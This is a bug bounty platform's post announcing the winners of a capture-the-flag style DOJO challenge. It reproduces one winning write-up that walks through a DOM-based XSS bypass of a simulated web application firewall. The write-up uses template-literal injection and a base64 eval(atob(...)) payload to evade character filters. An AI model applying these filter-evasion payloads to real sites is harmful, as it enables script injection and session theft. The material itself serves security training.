DOJO CHALLENGE #18 Winners!

February 11, 2022

The #18th DOJO CHALLENGE is the second version of DOJO #15th. Version 2.0 offers new security levels simulating the behavior of a web application firewall in order to execute JavaScript code in an arbitrary way.

💡 You want to create your own DOJO and publish it? Send us a message on Twitter!

WINNERS!

We are glad to announce the #18 DOJO Challenge winners list.

3 BEST WRITE-UP REPORTS

  • The best write-ups reports were submitted by:_Yo0x, parsely and kacihmd! Congrats 🥳

Subscribe to our Twitter and/or Linkedin feeds to be notified of the upcoming challenges.

Read on to find the best write-up as well as the challenge author’s recommendations.

The challenge

Web application firewall bypass v2.0

See the challenge page >

We asked you to produce a qualified write-up report explaining the logic allowing such exploitation. This write-up serves two purposes:

  • Ensure no copy-paste would occur.
  • Determine the contestant ability to properly describe a vulnerability and its vectors inside a professionally redacted report. This capacity gives us invaluable hints on your own, unique, talent as a bug hunter.

BEST WRITE-UP REPORT

We received a large number of reports and all of them were detailed, well explained… However, we had to make a selection of the best ones. These challenges allow to see that there are almost as many different solutions… as long as there is creativity! 😉

Thanks again for all your submissions and thanks for playing with us!

_Yo0x’s Write-Up

————– START OF _Yo0x REPORT ——————

Description

Dom Based XSS is a vulnerability that allow an attacker to execute javascript as a result of modifying the DOM “environment” in the victim’s browser. The attacker can use this XSS to execute arbritrary java script code to steal user information. Generally the XSS are used to steal session cookies.

The goal of this challenge is to manipulate the DOM in order to bypass firewall warning.
To do this we have to inject javascript and make system.Running continue run the program fsociety00.dat without warning.

Exploitation

  • Here is the code source of this challenge:
output = document.getElementById('status')

    //System information:
    var system = {
        Health: 'OK',
        Firewall: 'UP',
        Running: 'fsociety00.dat',
        Allow: ['Ecorp.exe', 'Ebackup.exe'],
    }

    //Allow Elliot to take action! / Tyrell
    MrRobot_cmd = `$cmd`;

    //Checking the system health status:
    if ( system.Allow.length == 2 && system.Allow.includes(system.Running)) {
        system.Health = 'OK';
        output.innerHTML = system.Health;
        c = 'green';

    } else {
        system.Health = 'WARNING';
        output.innerHTML = system.Health;
        c = 'red';
    } 

    //Debug [Hint - Check dev console!]
    console.log('[INFO]', system.Health, system.Allow.length, system.Allow)
    output.style.color = c;

    /*Verify if the challange is solved!*/
    if (system.Allow.length == 2 && system.Health == 'OK' && system.Allow.includes('fsociety00.dat')){alert('You solved it, YEY!')}
    /*End*/

Let’s have a look at the code: we have to input our payload in $cmd but we have the following constraints:

The first thing i saw is the backticks in $cmd.
The second thing i saw is the ${ filter that is replaced by ""… why it is not replaced by __Nope__ ?

In javascript the backticks around a string are used as templates literals.
Templates literal is a way to do multi-line string or string interpolation with embedded expression.

So what can we do now ?

The filter ${ replace by "" can be bypassed with $${{. That give us ${, so we can craft our first payload.

  • Here you can see my first payload to trigger the XSS.

Now, i have still the warning status because we don’t respect the following condition:

if ( system.Allow.length == 2 && system.Allow.includes(system.Running)) {
        system.Health = 'OK';
        output.innerHTML = system.Health;
        c = 'green';

According to this condition we have to pop the system.Allow array and push fsociety00.dat.
According to the constraints, dot is filtered.

If we decode base64 payload with atob and eval this instruction we will be able to bypass dot filter.

  • First of all we have to craft a valid JavaScript payload.
system.Allow.pup(); system.Allow.push("fsociety00.dat")
  • Let’s encrypt the payload in base64
c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ==
eval(atob(‘c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ==))
  • Let’s solve this challenge with this following payload
$${{eval(atob('c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ=='))}
  • $${{}: to execute expression in templates literals and bypass WAF
  • eval(): to evaluate our decoded expression
  • atob(): to decode base64

PoC

$cmd=$${{eval(atob('c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ=='))}

Remediation

  • Increase WAF restriction about untrusted user input data

Conclusion

Thanks for this challenge !! It’s the first challenge I am doing in YesWehack DOJO and I really enjoyed solving it.
It was very fun to learn new XSS method with template literal.

Thank you for reading.

_Yo0x

————– END OF _Yo0x REPORT ——————

START HUNTING!🎯